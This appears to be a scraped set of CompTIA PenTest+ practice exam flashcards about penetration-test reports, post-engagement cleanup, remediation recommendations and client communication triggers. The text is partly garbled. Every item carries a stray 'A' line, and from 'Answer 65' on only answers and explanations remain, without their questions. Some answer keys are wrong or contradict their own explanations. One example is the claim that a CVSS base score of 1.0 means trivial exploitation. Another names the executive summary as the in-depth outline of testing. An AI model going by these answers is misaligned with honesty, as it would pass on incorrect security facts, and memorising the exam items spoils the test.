You are a penetration tester, and you are completing the test for a new client. Once the testing is done, you are prioritizing the findings and recommendations for an executive summary. Which one of the following considerations would be the most beneficial to your client?

A.The availability of patches and other remediations B.The levels of difficulty to exploit the identified vulnerabilities
C.The risk tolerance of the client’s organization
D.The time it took to accomplish each step

Answer

A

C.The risk tolerance of the client’s organization

Explanation:
In this scenario, it would be important to put the risk tolerance of the client’s organization into the executive summary. Risk tolerance is basically how much risk an organization is willing to take on where their investments are concerned. With any type of investment, there is always risk, but how much risk one is able to withstand is their risk tolerance. This may be different for every organization. You cannot put a set value on risk tolerance.

Question 50

Q

You are a security analyst, and you have just completed a penetration test for a new client. You are writing up the executive summary. What item would not be appropriate when writing an executive summary?

A.You should include a description of all your findings and vulnerabilities.
B.You should include a statement of risk for all found vulnerabilities.
C.You should make sure it’s written in plain language. D.You should include all the technical details pertaining to the testing.

Answer

A

D.You should include all the technical details pertaining to the testing.

Explanation:
An executive summary should not contain technical detail. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” You should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Question 51

Q

You are a penetration tester, and you have just completed testing for a new client. A detailed penetration report was given to the security analyst. The penetration was conducted against the client’s DMZ environment. The report had a finding that the Common Vulnerability Scoring System (CVSS) had a base score of 1.0. To exploit this vulnerability, which level of difficulty would be required?

A.Very difficult, because the perimeter systems are usually behind a firewall
B.Somewhat difficult, because it would require powerful processing power to exploit
C.Trivial, because little effort would be required to exploit the findings
D. Impossible, because the external hosts are hardened to protect against attacks

Answer

A

C.Trivial, because little effort would be required to exploit the findings

Explanation:
The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use CVSS ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

Question 52

Q

You are a penetration tester, and you are planning a test for a new client. You are writing a report that outlines the overall level of risk to operations. In which part of the report should you include this information?

A.Appendices
B.Executive summary
C.Main body
D.Technical summary

Answer

A

B.Executive summary

Explanation;
In this scenario, the question states that the penetration tester is writing a report “that outlines the overall level of risk.” Given this statement, the tester will be including this information in the executive summary. The executive summary is the most important section of the report. It should be written in a manner that conveys all the important conclusions of the report in a clear manner that is written in “layman’s terms.” A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Question 53

Q

You are a security analyst, and you are reviewing the results of a recent internal vulnerability scan that was performed against intranet services. The scan reports indicated that there was a critical vulnerability. The report indicated the following:

Title: Remote Command Execution vulnerability in web server

Rating: Critical (CVSS 10.0) Threat actor: any remote user of the web server

Confidence: certain

Recommendation: apply vendor patches

What should you do first?

A.Apply a risk rating and how it affects the organization.
B.Exploit the server to determine whether the scan indicated a false positive.
C.Inform senior management regarding the vulnerability.
D.Organize for critical out-of-cycle patching.

Answer

A

A.Apply a risk rating and how it affects the organization.

Explanation:
In this scenario, it asks what the security analyst should do first. Once the vulnerability has been identified, you need to rate the risk and how it affects your organization. The rating will determine whether it is safe enough to continue with the work or whether you need to adopt additional control measures to reduce or eliminate the risk. The rating depends upon the likelihood of an event occurring and the severity of the vulnerabilities. The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of security vulnerabilities. The CVSS uses an algorithm to determine three severity rating scores: Base, Temporal, and Environmental. The scores are numeric and range from 0.0 to 10.0. The most severe is 10.0. According to CVSS, a score of 0.0 receives a None rating, a 0.1–3.9 score gets a Low severity rating, a score of 4.0–6.9 is a Medium rating, a score of 7.0–8.9 is a High rating, and a score of 9.0–10.0 is a Critical rating. In this scenario, the score is 10.0 and falls within the Critical category.

Question 54

Q

You are a penetration tester, and you have just completed testing for a new client. You are creating a written report of your findings after the testing. In what section of the report should you provide the reader with an in-depth outline of the testing performed and the results found?

A.In the Executive Summary section
B.In the Findings and Remediation section
C.In the Methodology section
D.In the Metrics and Measures section

Answer

A

A.In the Executive Summary section

Explanation:
The executive summary is the most important section of the report. Most times, it is the only section that many individuals will read, so it should be written in a manner that conveys all the important conclusions of the report in “layman’s terms,” in other words, in a clear manner that is understandable to everyone. The executive summary serves as a high-level view of both risk and business impact in plain English. Its purpose is to be concise and clear. It should be nontechnical so readers can review and gain insight into the security concerns that are highlighted in the report.

Question 55

Q

You are a penetration tester, and you have just completed testing for a new client. You are creating a written report of your findings after the testing. Based on the results of your testing, you have come up with a list of recommendations you think the client should focus on. In what section of the report should you put these recommendations?

A.In the Conclusion section
B.In the Executive Summary section
C.In the Findings and Remediation section
D.In the Methodology section

Answer

A

A.In the Conclusion section

Explanation:
The conclusion is your opportunity to summarize your report and to make recommendations. The conclusion is the final overview of the test. It should end on a positive note giving the client support and guidance.

Question 56

Q

You are a penetration tester, and you have just completed testing for a new client. You are conducting a post-engagement cleanup. What activities are performed during the post-engagement cleanup phase? (Choose three.)

A.Remediating vulnerabilities
B.Removing any tools used
C.Removing shells
D.Removing the tester-created credentials

Answer

A

B.Removing any tools used
C.Removing shells
D.Removing the tester-created credentials

Explanation:
CompTIA highlights three important post-engagement cleanup activities: Removing any shells installed on systems during the penetration test Removing any tester-created accounts, credentials, or backdoors that were installed during testing Removing any tools that were installed during testing Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

Question 57

Q

You are a penetration tester, and you have just completed testing for a new client. While doing a cleanup after the test it is discovered that the client does not have the necessary data wiping tools. The tools needed were then distributed to the technicians who needed them. During what phase should you revisit this issue?

A.During the lessons learned phase
B.During the mitigation phase
C.During the preparation phase
D.During the reporting phase

Answer

A

A.During the lessons learned phase

Explanation:
In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

Question 58

Q

You are a penetration tester, and you are conducting a test for a new client. You have just about completed the testing, and you want to make sure that the post-engagement cleanup process has
no issues. What should you do throughout the testing phase to make sure that the post-engagement goes effortlessly?

A.You should create backdoors so you can access them later.
B.You should carefully record everything you’ve done during the testing.
C.You should erase any log entries that you created during your exploitation.
D.You should create images of all systems and devices so you can restore them to their pre-test state.

Answer

A

B.You should carefully record everything you’ve done during the testing.

Explanation:
After a penetration test, it is imperative that you undo everything you have done to your client’s network. The best way to do this is by carefully documenting everything you’ve done while conducting the testing. That way, you don’t accidentally forget something.

Question 59

Q

You are a penetration tester, and you have just completed testing for a new client. You are conducting the post-engagement cleanup process. What should you do during the post-engagement cleanup process? (Choose two.)

A.You want to make sure to remove any shell sessions that you created during the testing.
B.You want to make sure to hide everything you did during the testing from the client.
C.You want to make sure to document everything you did during the testing.
D.You want to hide everything you did during the clean up after the testing.

Answer

A

A.You want to make sure to remove any shell sessions that you created during the testing. .
C.You want to make sure to document everything you did during the testing.

Explanation:
After a penetration test, it is imperative that you undo everything you have done to your client’s network. So, if you have created any shells, they need to be removed. It is also important to document everything you’ve done while conducting the testing. That way, you don’t accidentally forget something. The goal is to put everything the way it was prior to your testing.

Question 60

Q

You are a penetration tester, and you have just completed testing for a new client. You are meeting with your client to discuss the penetration test. At the end of the meeting, you ask your client to sign an agreement stating that you have fulfilled your responsibilities according to your contract. What is this called?

A.Attestation of findings
B.Client acceptance
C.Follow-up actions/retest
D.Lessons learned

Answer

A

B.Client acceptance

Explanation:
You should obtain client acceptance upon the completion of your services. This may include a written acknowledgment of your final report. Most times, this includes a face-to-face meeting where you can discuss the results of the engagement with your client and answer any questions they might have. Client acceptance marks the end of the engagement and is the formal agreement that the tester has completed the scope of work.

Question 61

Q

You are a penetration tester, and you have just completed testing for a new client. You are meeting with your client to discuss the penetration test. During this meeting, you provide the client with a document stating that you have conducted testing and that the client is in compliance with the rules and regulations set forth by one of the client’s government contracts. What is this called?

A.Attestation of findings
B.Client acceptance
C.Follow-up actions/retest
D.Lessons learned

Answer

A

A.Attestation of findings

Explanation:
An attestation of findings is a document provided by the penetration testers to document that they conducted a test and the results for compliance purposes. It serves as record of the tester performing the penetration test. It includes a summary of the findings. Its intent is for external use, outside of your client’s organization, to show proof that a penetration test was performed and to highlight the test results.

Question 62

Q

A junior technician in an organization’s IT department runs a penetration test on a corporate web application. During testing the technician discovers that the application can disclose a SQL table that has all the corporate user account and password information. How should the junior technician notify upper management?

A.The technician should connect to the SQL server using this information and change the passwords of a few noncritical accounts to demonstrate a proof of concept to management.
B.The technician should document the findings using an executive summary including recommendations and screenshots to provide to management.
C.The technician should notify the development team of the discovery and suggest that input validation be enforced on the web application’s SQL query strings. D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.

Answer

A

D.The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company.

Explanation:
In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company’s best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.

Question 63

Q

You and a colleague are discussing a scenario of an organization implementing email content filtering to block inbound messages that appear to come from internal sources without proper authentication. They also might filter out any messages that contain high-risk keywords or appear to be coming from known malicious sources. What common category of remediation activity would this fall under?

A.Measurement
B.People
C.Process
D.Technology

Answer

A

D.Technology

Explanation:
In this scenario, you are discussing technology. Technological controls also provide effective defenses against many security threats. There are three major categories of remediation activities. The categories are people, process, and technology.

Question 64

Q

You and a colleague are discussing multifactor authentication. Your colleague asks you for an example of what multifactor authentication is. What do you tell your colleague?

A.That multifactor authentication is using biometric fingerprints and voice recognition
B.That multifactor authentication is using smart cards and PINs
C.That multifactor authentication is using retina scans and voice recognition
D.That multifactor authentication is using usernames, PINs, and employee ID numbers

Answer

A

B.That multifactor authentication is using smart cards and PINs

Explanation:
In this scenario, the best option to tell your colleague is that multifactor authentication is using smart cards and PINs. Multifactor authentication (MFA) is a security system that requires more than one method of authentication from separate categories of credentials to verify the user’s identity for a login or other transaction. The authentication categories are something you know, something you have, and something you are.

Answer 65

A

B.Something you have

Explanation:
In this scenario, you and your colleague are discussing something you have. Physical objects may be used as authentication mechanisms. Organizations seeking to protect sensitive information and critical resources should implement multifactor authentication. Multifactor authentication implementations combine two or more authentication mechanisms coming from different authentication categories. The authentication categories are something you know, something you have, and something you are.

Answer 66

A

A.That they disable the unneeded services

Explanation:
In this scenario, there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client uses only port 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

Answer 67

A

C.That they perform system hardening

Explanation:
System hardening, also known as operating system hardening, helps minimize security vulnerabilities. The purpose of system hardening is to get rid of as many security risks as possible. This is usually done by removing all nonessential software programs and utilities from the
computer. The goal of systems hardening by removing unused programs, accounts functions, applications, ports, permissions, access, etc., is that attackers have fewer opportunities to gain access to your network. There are several types of system hardening activities. They include the following: Application hardening

Operating system hardening

Server hardening

Database hardening

Network hardening

Answer 68

A

A.They should disable any unnecessary services.

Explanation:
The best recommendation would be to disable any unneeded services. Unnecessary services can pose a security risk because they increase your client’s network attack surface, providing a potential attacker with a number of ways to try to exploit the system. An attack surface is the total sum of the vulnerabilities in a given computing device or network that are accessible to a potential hacker.

Answer 69

A

A.Local Administrator Password Solution (LAPS)

Explanation:
Local Administrator Password Solution (LAPS) is a Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory. Limited Administrator Password Assistance (LAPA) does not exist. Nessus is a vulnerability scanner, and Metasploit is an exploitation framework used to execute and attack networks.

Answer 70

A

B.That for all logons, they require multifactor authentication
E.That they increase the minimum password complexity requirements
G.That on every workstation, they enable full-disk encryption

Explanation:

In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be as follows: Use multifactor authentication: Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. Increase minimum password complexity: Complex passwords use different types of characters in unique ways to increase security making it harder for an attacker to crack. Enable full-disk encryption: Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

Answer 71

A

A.Block URL redirections.

Explanation:
In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

Answer 72

A

A.Recommend increased password complexity requirements.
F.Recommend requiring that all employees take security awareness training.
G.Recommend upgrading the cipher suite used for the VPN solution.

Explanation:
In this scenario, the tester should recommend that the client increase their password complexity requirements since the tester was able to crack them by using a dictionary attack. The tester should also recommend that all employees take security awareness training, since it was a member of the IT department who gave up pertinent information when
the tester used a phishing technique. The tester should also recommend upgrading the cipher suite that is used for the VPN solution. A cipher suite is a set of algorithms that help secure network connections that use Transport Layer Security (TLS) or Secure Socket Layer (SSL). The algorithms that cipher suites usually contain include a key exchange algorithm, a bulk encryption algorithm, and a message authentication code (MAC) algorithm.

Answer 73

A

A.That they enable HTTP Strict Transport Security (HSTS)

Explanation:
In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). An HSTS response header lets a website tell browsers that it should be accessed using only HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

Answer 74

A

A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.

Explanation:
These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, you would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

Answer 75

A

D.That they correct the most critical vulnerability first, even if it means fixing the other vulnerabilities may take longer to correct

Explanation:

In this scenario, the client does not have the budget to immediately correct all the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.

Answer 76

A

B.Immediately alert the client with details of the findings

Explanation:
In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

Answer 77

A

A.De-confliction

Explanation:
De-confliction refers to the communication between the client and the tester to determine whether the detected attacker is actually part of the physical security assessment. It may sometimes be necessary to create a “get out of jail free” card, which has emergency off-hours phone numbers of higher ranking officers within the company who are aware of the test

Location: 9406

and can confirm that the tester has the authority to conduct the tests requested.

Answer 78

A

B.De-escalation

Explanation:
The term de-escalation refers to the process of communication between the client and the tester to stop any exploitation being used during the penetration test because of the effects they may be having on the client’s network. In this scenario, the client was losing sales because of the website issues, so the testing needed to be stopped.

Answer 79

A

D.Stages

Explanation:
In this scenario, the tester has completed one phase of testing and is ready to move onto the next phase. This is called stages. During completion of a testing stage, the tester should contact the client and inform them of the completion of one stage and proceed to the next stage of testing.

Answer 80

A

A.Critical findings

Explanation:
If the penetration tester finds a critical issue with the security of their client’s environment, they should not wait for the delivery of their final report. By leaving a critical vulnerability unaddressed, it may put the client at an unacceptable level of risk and result in a potential compromise. The tester should immediately notify management of the issue.

Brainscape's Knowledge GenomeTM

CompTIA PenTest+ Practice Test Chapter 7 Practice Exam 2 (Sybex: Panek, Crystal, Tracy) Flashcards

Brainscape's Knowledge Genome^TM